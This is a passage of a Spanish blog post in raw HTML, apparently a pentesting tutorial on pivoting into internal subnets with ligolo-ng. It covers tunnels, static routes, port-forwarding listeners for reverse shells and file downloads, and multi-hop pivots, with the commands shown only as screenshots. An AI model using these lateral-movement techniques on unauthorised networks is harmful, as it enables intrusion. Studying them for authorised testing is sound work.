href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6-H3Q-YLweG-ue0oRVUQKYbex4B5deDHNkWeknmQBJYquPyYjMsVjM4FU10A6z0K0gMvQThfVvAtF0E_CXjtcgeSMZDjq8hriBt3LmcpIcBq3VysOUbxVQG-ythj7f2aEeSv0-ydA3RZwYIq73wrrB8O0MzLEcoxpwHJtnxT3oszrHt5fLDLwM7-QutaQ/s2000/proxy%201.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="680" data-original-width="2000" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6-H3Q-YLweG-ue0oRVUQKYbex4B5deDHNkWeknmQBJYquPyYjMsVjM4FU10A6z0K0gMvQThfVvAtF0E_CXjtcgeSMZDjq8hriBt3LmcpIcBq3VysOUbxVQG-ythj7f2aEeSv0-ydA3RZwYIq73wrrB8O0MzLEcoxpwHJtnxT3oszrHt5fLDLwM7-QutaQ/w640-h218/proxy%201.png" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">En donde se nos presenta las distintas opciones de certificados TLS que disponemos:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><ul style="text-align: left;"><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><b>Autocert</b>: El proxy automáticamente solicitará un certificado usando Lets encrypt. Esta opción requiere accesibilidad al puerto 80. </span></li></ul><ul style="text-align: left;"><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><b>Certfile / -keyfile:</b> Si queremos usar nuestros propios certificados.</span></li></ul><ul style="text-align: left;"><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><b>Selfcert:</b> Generara automáticamente un certificado autofirmado. Esta opción es la menos recomendada en términos de seguridad, pero si estamos trabajando en un laboratorio aislado o en un entorno de pruebas, es una opción válida.</span></li></ul><ul style="text-align: left;"><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><b>Tun <nombre interfaz>:</b> En el caso de haber escogido otro nombre para la interfaz.</span></li></ul><ul style="text-align: left;"><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><b>Laddr <IP:port>: </b> La interfaz de escucha por defecto 0.0.0.0:11601, para definir otra interfaz lo indicaremos mediante este comando.</span></li></ul></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Lanzamos el proxy con la configuración por defecto, valiéndonos de certificados autofirmados para el cifrado de la conexión</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">En la máquina atacante:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBLbPbORP7XXYsUG71MG9dVP3CvanpibpsdCwB9JYO9gitbo6smImwYiMg7wXMbRkDwt3tmW098dL_RkAvFnzew5WFay1dgI7w6diOgsesngmdaryJHEmAiq_sYMoVSzsd6QOydFisWHQn7bMowFWZsn1tmaTJbVB58UzKG0PDe7IdPLjev1ihUSum1Jwo/s2067/m%C3%A1quina%20atacante.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="196" data-original-width="2067" height="60" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBLbPbORP7XXYsUG71MG9dVP3CvanpibpsdCwB9JYO9gitbo6smImwYiMg7wXMbRkDwt3tmW098dL_RkAvFnzew5WFay1dgI7w6diOgsesngmdaryJHEmAiq_sYMoVSzsd6QOydFisWHQn7bMowFWZsn1tmaTJbVB58UzKG0PDe7IdPLjev1ihUSum1Jwo/w640-h60/m%C3%A1quina%20atacante.png" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">En la máquina víctima:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0CQFMg23wQ6qUc0MvP3iiirooPOhEQXaLij49UXTxhKtQ8m_YXlHhLJOmrga4DeU01kRA0F2cZOPw3bTrv6zefaprJSZC_vGeu2kiZ5ejFdrhTwCwtPOFot2NVvQmwzzl846FZQUKtBLfeHVEaYs8dCyMgZUbe_A-4Kr4yV9R-JVtHyx8gBd7mILQxacv/s2067/m%C3%A1quina%20v%C3%ADctima.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="196" data-original-width="2067" height="60" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0CQFMg23wQ6qUc0MvP3iiirooPOhEQXaLij49UXTxhKtQ8m_YXlHhLJOmrga4DeU01kRA0F2cZOPw3bTrv6zefaprJSZC_vGeu2kiZ5ejFdrhTwCwtPOFot2NVvQmwzzl846FZQUKtBLfeHVEaYs8dCyMgZUbe_A-4Kr4yV9R-JVtHyx8gBd7mILQxacv/w640-h60/m%C3%A1quina%20v%C3%ADctima.png" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Ya tendríamos la sesión creada:</span></div><div class="separator" style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWQBGc4eglrJntNh7sr9JTXCX9qvPx5HBAEa7etk6rzALnStSsoHLJEQEmNlvuxxPZ0JmAkfLufrgyUS2Pw-8MNI4JPxhLn1f5hUEztqj5XM3wmDw2GLFf0sJtv5T-sqC_uNOrQwlLXpkbooKVZ8EAsH97AvKSHxdTO06YCxM_9Me03CB45Q-LSeasarQr/s2000/sesi%C3%B3n%20creada%20ligolo-ng.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="379" data-original-width="2000" height="122" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWQBGc4eglrJntNh7sr9JTXCX9qvPx5HBAEa7etk6rzALnStSsoHLJEQEmNlvuxxPZ0JmAkfLufrgyUS2Pw-8MNI4JPxhLn1f5hUEztqj5XM3wmDw2GLFf0sJtv5T-sqC_uNOrQwlLXpkbooKVZ8EAsH97AvKSHxdTO06YCxM_9Me03CB45Q-LSeasarQr/w640-h122/sesi%C3%B3n%20creada%20ligolo-ng.png" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Ahora seleccionamos en el proxy (maquina atacante) la sesión que acabamos de crear:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW_TGp8iY_EVfFEmgm7A_hl__YU_btcORj-pNN7_7y8VJP7x2UbFwMY0PfMFQlhcSIAZFwUrkCWyFtZkCO_noHO-sdAl5DPrOZTEAWeNsGXXKUTfK-9af6CF2LYk3eSXHv8M2Q2d9LAcA50b6Mq7TmXFwi3Ge2tVvwIw5YtFmOxHWUChaY5quZnNETyjNA/s2000/proxy%20maquina%20atacante.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="319" data-original-width="2000" height="102" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW_TGp8iY_EVfFEmgm7A_hl__YU_btcORj-pNN7_7y8VJP7x2UbFwMY0PfMFQlhcSIAZFwUrkCWyFtZkCO_noHO-sdAl5DPrOZTEAWeNsGXXKUTfK-9af6CF2LYk3eSXHv8M2Q2d9LAcA50b6Mq7TmXFwi3Ge2tVvwIw5YtFmOxHWUChaY5quZnNETyjNA/w640-h102/proxy%20maquina%20atacante.png" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Siempre tendremos que indicar sobre que sesión queremos trabajar. Una vez levantada la sesión podemos llevar a cabo diferentes acciones:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwKA5yOzySBEX5dAC8yMdL2iDWN9owOA-oOB2d_0frfauioYz8-eWDtOYrfWTBU7AEVQEzIT-6J2UFdZITJEUcpK_jHVIyJS48oh6LNfVWHb0Cfc9SKeElFeSQCVXIGib-76WmKOQhkIgW9nht4FpgR-VzwznsMQSvdVrP7Unom9V5MXeEmQ7oTfFASPrs/s2000/diferentes%20acciones.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="1481" data-original-width="2000" height="474" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwKA5yOzySBEX5dAC8yMdL2iDWN9owOA-oOB2d_0frfauioYz8-eWDtOYrfWTBU7AEVQEzIT-6J2UFdZITJEUcpK_jHVIyJS48oh6LNfVWHb0Cfc9SKeElFeSQCVXIGib-76WmKOQhkIgW9nht4FpgR-VzwznsMQSvdVrP7Unom9V5MXeEmQ7oTfFASPrs/w640-h474/diferentes%20acciones.png" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Desde el propio proxy podremos consultar las interfaces de red que hay levantadas en el agente (víctima) mediante el comando<i> ifconfig</i>:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHQb7hM0eCw-tnrmHPxLm_cNBt3dx9X557nT0eYlhstilDflSFeMFKsjGPljQxJTs01cOknKz_LjYNfjgJF31rc2iD7LOnoWLPHgB0qVgmuZvF0PwIDdMyCfGuC9E5KKbgATWdh4sm6E2nBhiZf0-oSOJytzIuSmhe4IRK7QWGZV3rAUFVyz73UIlApWxz/s2000/ifconfig.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="1846" data-original-width="2000" height="590" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHQb7hM0eCw-tnrmHPxLm_cNBt3dx9X557nT0eYlhstilDflSFeMFKsjGPljQxJTs01cOknKz_LjYNfjgJF31rc2iD7LOnoWLPHgB0qVgmuZvF0PwIDdMyCfGuC9E5KKbgATWdh4sm6E2nBhiZf0-oSOJytzIuSmhe4IRK7QWGZV3rAUFVyz73UIlApWxz/w640-h590/ifconfig.png" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Para poder llegar a esta nueva red (192.168.1.0/24) tendremos que indicar a nuestra máquina atacante que redirija el tráfico con destino 192.168.1.0/24 a través del túnel Ligolo que acabamos de crear. Para ello añadimos la siguiente ruta estática a la tabla de routing de la máquina atacante: </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjexN9MNKrPVffcd5Oh8Li0LkgQ1u0svgFek2D06TcRdA56gL86PeaDKXmU6suUArX6gTWaUvvwBa7OJax1u_jDyoXydTGtZn2MEh9ZUPvdLXLg4Nte7HHORkJnaVKy-LhwgwRatdxx0FBkG2pFRVww1rrytFYKreUXKBNCaz9FQpdTg5yPOt-jsZMmtTns/s2067/ruta%20est%C3%A1tica.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="196" data-original-width="2067" height="60" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjexN9MNKrPVffcd5Oh8Li0LkgQ1u0svgFek2D06TcRdA56gL86PeaDKXmU6suUArX6gTWaUvvwBa7OJax1u_jDyoXydTGtZn2MEh9ZUPvdLXLg4Nte7HHORkJnaVKy-LhwgwRatdxx0FBkG2pFRVww1rrytFYKreUXKBNCaz9FQpdTg5yPOt-jsZMmtTns/w640-h60/ruta%20est%C3%A1tica.png" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Y por último iniciamos el túnel: </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYe9IGKfbFyAQD924G5tjT-dxWvKahfKpPIop8-FsYOp7jYCIPlSZh9IFzmrrnAQp057X9p6e1PWQa0ZoLP9KrukUVBfPSmNAkUMlCSty7Y-97p0DR-BH-7zY_ndLGXbR09ZgrPAZATo-7PQKM9PkYYRbq2kK_Ns3QlMG2GJLdQ8XCqsX9bmXyHISI0_ge/s2000/tunel.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="196" data-original-width="2000" height="62" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYe9IGKfbFyAQD924G5tjT-dxWvKahfKpPIop8-FsYOp7jYCIPlSZh9IFzmrrnAQp057X9p6e1PWQa0ZoLP9KrukUVBfPSmNAkUMlCSty7Y-97p0DR-BH-7zY_ndLGXbR09ZgrPAZATo-7PQKM9PkYYRbq2kK_Ns3QlMG2GJLdQ8XCqsX9bmXyHISI0_ge/w640-h62/tunel.png" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Os muestro en el siguiente diagrama lo realizado hasta aquí:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsNnxfyBPIC-GsXkIyeJOB5zDOxCMfOm4POJR2Lfmbw3ApSFPC8NpppAYD5PupXVu-8naeiapH7y8sqshuiWOclW2O89vqqjqwlOSyWSuzLLypFIuNxqQZaN01v3mKJJ2AnLIBbV6MJpS5qjWg4hbeX_svIn2k0CCP2xE2dbCX1n2NCclGTBc-S-80SHpt/s1132/Diagrama%201.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="523" data-original-width="1132" height="296" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsNnxfyBPIC-GsXkIyeJOB5zDOxCMfOm4POJR2Lfmbw3ApSFPC8NpppAYD5PupXVu-8naeiapH7y8sqshuiWOclW2O89vqqjqwlOSyWSuzLLypFIuNxqQZaN01v3mKJJ2AnLIBbV6MJpS5qjWg4hbeX_svIn2k0CCP2xE2dbCX1n2NCclGTBc-S-80SHpt/w640-h296/Diagrama%201.png" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Y ahora pasamos a comprobar que llegamos a la nueva subred (192.168.1.0/24) a través de la interfaz eth1 de la víctima:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPcAQVmv-LS417D_o-pdruDLALliAn8t4za801lRvHjyJPYfkdWaB-ESctL5dPZ6260UEnQ_YsCktctAnE2DXLRDhFG10zZfVwfixsa-gG4z3zK6qYjbFpMJeNfiUdSTt1ZTuIj7EzxoJgvsppIq83OjFLeWd8znO2__Q30jnlcv_RjYr7jdsedyqdMPZP/s2000/interfaz%20eth1.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="548" data-original-width="2000" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPcAQVmv-LS417D_o-pdruDLALliAn8t4za801lRvHjyJPYfkdWaB-ESctL5dPZ6260UEnQ_YsCktctAnE2DXLRDhFG10zZfVwfixsa-gG4z3zK6qYjbFpMJeNfiUdSTt1ZTuIj7EzxoJgvsppIq83OjFLeWd8znO2__Q30jnlcv_RjYr7jdsedyqdMPZP/w640-h176/interfaz%20eth1.png" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><h2 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Enlace puente</span></h2><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Los agentes permiten escuchar en puertos prestablecidos, de tal forma que todo el tráfico entrante hacia esos puertos sea redirigido directamente a la máquina atacante. </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Desde el proxy (atacante) y sobre la misma sesión que teníamos establecida, levantamos un listener en el agente (víctima): </span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxfYEi7Fxkj2e5Ll_8utUntHckcShswoKJtzNyJ2lwgDKaNF6zZx39-KyodaHIQvFm69GPcOUPCgp-0pihU9tEe1oM1P7bXu474WocZFIsWdqENlRuVwDflKCwGNgXK4KGeQubI-dkN3CW_x-Kp-j2dWyWDq1m3Nu2TW0AU5eR93WzRVEAEYCzIqGya7yR/s2067/enlace%20puente.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="196" data-original-width="2067" height="60" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxfYEi7Fxkj2e5Ll_8utUntHckcShswoKJtzNyJ2lwgDKaNF6zZx39-KyodaHIQvFm69GPcOUPCgp-0pihU9tEe1oM1P7bXu474WocZFIsWdqENlRuVwDflKCwGNgXK4KGeQubI-dkN3CW_x-Kp-j2dWyWDq1m3Nu2TW0AU5eR93WzRVEAEYCzIqGya7yR/w640-h60/enlace%20puente.png" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb3adjL9nmb3Y4M0pYWeDYvs_blOsYuYBLDWZceMJZ73ZHVuoZ0eZwtSW0lMBocfDwXYoWH5UWxykBjpDc-NKNoqep-c6ANwg6SbBTO_fH-0FJgkIk1WVFpB9oQPgvFoZEes4yNMepmnq-c7ZIICdJuhyphenhyphent4qK_sroMXcLY4FBvGBesMOtDXc3XOZjFsPvZ/s2000/enlace%20puente%20negro.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="185" data-original-width="2000" height="60" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb3adjL9nmb3Y4M0pYWeDYvs_blOsYuYBLDWZceMJZ73ZHVuoZ0eZwtSW0lMBocfDwXYoWH5UWxykBjpDc-NKNoqep-c6ANwg6SbBTO_fH-0FJgkIk1WVFpB9oQPgvFoZEes4yNMepmnq-c7ZIICdJuhyphenhyphent4qK_sroMXcLY4FBvGBesMOtDXc3XOZjFsPvZ/w640-h60/enlace%20puente%20negro.png" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Cualquier tráfico entrante en la máquina víctima con destino el puerto 1234, será redirigido a la máquina atacante al puerto 4321. Esto es muy útil cuando tenemos que ejecutar un reverse payload hacia la máquina atacante o descargar ficheros en la víctima desde un servidor HTTP alojado en la máquina atacante. </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3AFRvEVvwJPQ0ly8QiMzmHgUYV6_WJazTI9E3yJ2U4XcTFgMqpU_0sicxIRGvJv8Ohez2M_q-bQcMkVDe5bKdvtRcSak1JvdnfePxpWBLQoQqSmhSHLT0kndIZxVrw98ywZ0clHZEYy8UUcjjzmIV1bAmJuHLCNKdXNgQTZ33S1kcqDPpBw5FSBikjh6G/s2000/m%C3%A1quina%20atacante%20http.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="205" data-original-width="2000" height="66" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3AFRvEVvwJPQ0ly8QiMzmHgUYV6_WJazTI9E3yJ2U4XcTFgMqpU_0sicxIRGvJv8Ohez2M_q-bQcMkVDe5bKdvtRcSak1JvdnfePxpWBLQoQqSmhSHLT0kndIZxVrw98ywZ0clHZEYy8UUcjjzmIV1bAmJuHLCNKdXNgQTZ33S1kcqDPpBw5FSBikjh6G/w640-h66/m%C3%A1quina%20atacante%20http.png" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Avanzamos quedando así, un ejemplo de una reverse shell seria este:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEga5mTCWG_MJ_xZ15UO9tc0O5fpkoYOC64HMbTWzCKShPt8J-Tzu7rVQTIphtqci0Sg534kQJlta7UO4A1P9SQn46ZYQE6Mmrx6ETHbr1x-VTRasN6wvYPdym-8u8eD3VrxpC7VZLdyZoeo9yedRTGJYhSEF-l3qZJuZI5JNXT4wEiFvj0vy9MgjObE62Ai/s982/Diagrama%202.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="553" data-original-width="982" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEga5mTCWG_MJ_xZ15UO9tc0O5fpkoYOC64HMbTWzCKShPt8J-Tzu7rVQTIphtqci0Sg534kQJlta7UO4A1P9SQn46ZYQE6Mmrx6ETHbr1x-VTRasN6wvYPdym-8u8eD3VrxpC7VZLdyZoeo9yedRTGJYhSEF-l3qZJuZI5JNXT4wEiFvj0vy9MgjObE62Ai/w640-h360/Diagrama%202.png" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Podemos gestionar cada uno de los listener levantados mediante <i>listener_list </i>y <i>listener_stop/start.</i></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeXCSoIYTJS1KBVAA1uxZcsPkzETCwhiyIhPJU4eGM0b17r7O2V15q2mBZpV4axbCyq8oZKkXMG4Xhc_FxscR_sdzOE74FF1AEWySKuKjbpqi8hfRHU2JUr3w7w4Yr8ERCVNzgJk2OmiB2U99pQhyphenhyphenqN2ZnkRcpvHVN_3R2k9nNlAF2W0GadkytP3dtDniW/s2000/listener.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="648" data-original-width="2000" height="208" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeXCSoIYTJS1KBVAA1uxZcsPkzETCwhiyIhPJU4eGM0b17r7O2V15q2mBZpV4axbCyq8oZKkXMG4Xhc_FxscR_sdzOE74FF1AEWySKuKjbpqi8hfRHU2JUr3w7w4Yr8ERCVNzgJk2OmiB2U99pQhyphenhyphenqN2ZnkRcpvHVN_3R2k9nNlAF2W0GadkytP3dtDniW/w640-h208/listener.png" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><h2 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Pivotando entre varias máquinas</span></h2><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Si queremos pivotar entre varias máquinas, podemos crear tantas sesiones como queramos apoyándonos de los listener, de tal forma que en cada máquina haya un listener escuchado en un puerto establecido que nos redirija a la máquina anterior de salto y así sucesivamente, hasta llegar al puerto 11601 (por defecto) de la máquina atacante en donde proxy-ligolo está escuchando peticiones de nuevos agentes (víctimas).</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Ejemplo: desde la red 192.168.1.0/24 (donde se encuentra la máquina de salto) levantamos el agente (víctima 2) hacia el listener de la máquina intermedia (víctima 1) que nos redirigirá directamente al proxy-ligolo (atacante).</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: left;"><span style="font-family: "Barlow Semi Condensed"; text-align: justify;">1. Configuramos el listener en la máquina de salto (192.168.1.147) desde la máquina atacante:</span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAOcW4w-Z-6zPl06IuB_O3HwsF5hQIVZR6tJfYpOEkeYmOLwIGeRAOO2c_va1nUAhEWxf5vjIXYMRy5pTzqLBvprBqXvWEM19KRQ5W3zuzvqWgVTGrYoE165vQlM6K065xKD9ZxLjqvwY6xpS9EJp0lQ6WFkPeDaDwFKWC4tho3d3tJgk7m28N9kylELY8/s2000/m%C3%A1quina%20de%20salto.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="456" data-original-width="2000" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAOcW4w-Z-6zPl06IuB_O3HwsF5hQIVZR6tJfYpOEkeYmOLwIGeRAOO2c_va1nUAhEWxf5vjIXYMRy5pTzqLBvprBqXvWEM19KRQ5W3zuzvqWgVTGrYoE165vQlM6K065xKD9ZxLjqvwY6xpS9EJp0lQ6WFkPeDaDwFKWC4tho3d3tJgk7m28N9kylELY8/w640-h146/m%C3%A1quina%20de%20salto.png" width="640" /></span></a></div><div class="separator" style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;">2. <span style="text-align: left;">En la nueva máquina víctima lanzamos el agente (víctima 2) hacia el listener de la máquina de salto intermedia (192.168.1.147:11601):</span></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiESBaaBt3pRcuvHS6xYlY6mfzKDgjSyvvgkWu7mv99QELqmYgBXDFrXNo_K2taQflguI9ro8Nnnm8hwApGnzgoMU1QgLVB9ZPq-x-sPZIx93wwmQHGlEbmAls1fMTrmbfLmiKK9Hz2X7hyphenhyphenGMzeMXVsqg3tNKTj8KIy3MUbva90Di2neIeWydhK72oK-0VJ/s2000/m%C3%A1quina%20victima%20agente.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="170" data-original-width="2000" height="54" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiESBaaBt3pRcuvHS6xYlY6mfzKDgjSyvvgkWu7mv99QELqmYgBXDFrXNo_K2taQflguI9ro8Nnnm8hwApGnzgoMU1QgLVB9ZPq-x-sPZIx93wwmQHGlEbmAls1fMTrmbfLmiKK9Hz2X7hyphenhyphenGMzeMXVsqg3tNKTj8KIy3MUbva90Di2neIeWydhK72oK-0VJ/w640-h54/m%C3%A1quina%20victima%20agente.png" width="640" /></span></a></div><div class="separator" style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed; text-align: left;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed; text-align: left;">3. La conexión será redirigida al proxy-ligolo. Se establece una nueva sesión que permitirá a acceder a nuevas subredes:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a 